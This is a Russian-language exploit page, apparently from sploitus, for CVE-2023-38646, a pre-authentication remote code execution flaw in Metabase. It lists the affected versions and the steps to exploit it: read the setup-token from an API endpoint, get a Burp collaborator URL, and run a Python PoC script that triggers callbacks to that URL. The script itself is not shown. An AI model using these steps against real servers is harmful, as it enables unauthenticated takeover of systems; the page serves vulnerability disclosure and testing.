## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHAMO0-CVE-2023-38646-POC
# CVE-2023-38646 - Metabase: RCE до аутентификации

Metabase open source до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с уровнем привилегий сервера. Для эксплуатации аутентификация не требуется. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.
## Шаги PoC
1. Перейдите по адресу `http://vulnerablehost.com/api/session/properties`
2. Найдите "setup-token" 
3. Получите URL коллаборатора (протестировано с BurpSuite)
4. Запустите скрипт PoC с параметрами:
* `-u` \- URL цели
* `-t` \- Токен установки
* `-c` \- URL коллаборатора
* `python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>`
5. Проверьте свой коллаборатор на наличие обратных вызовов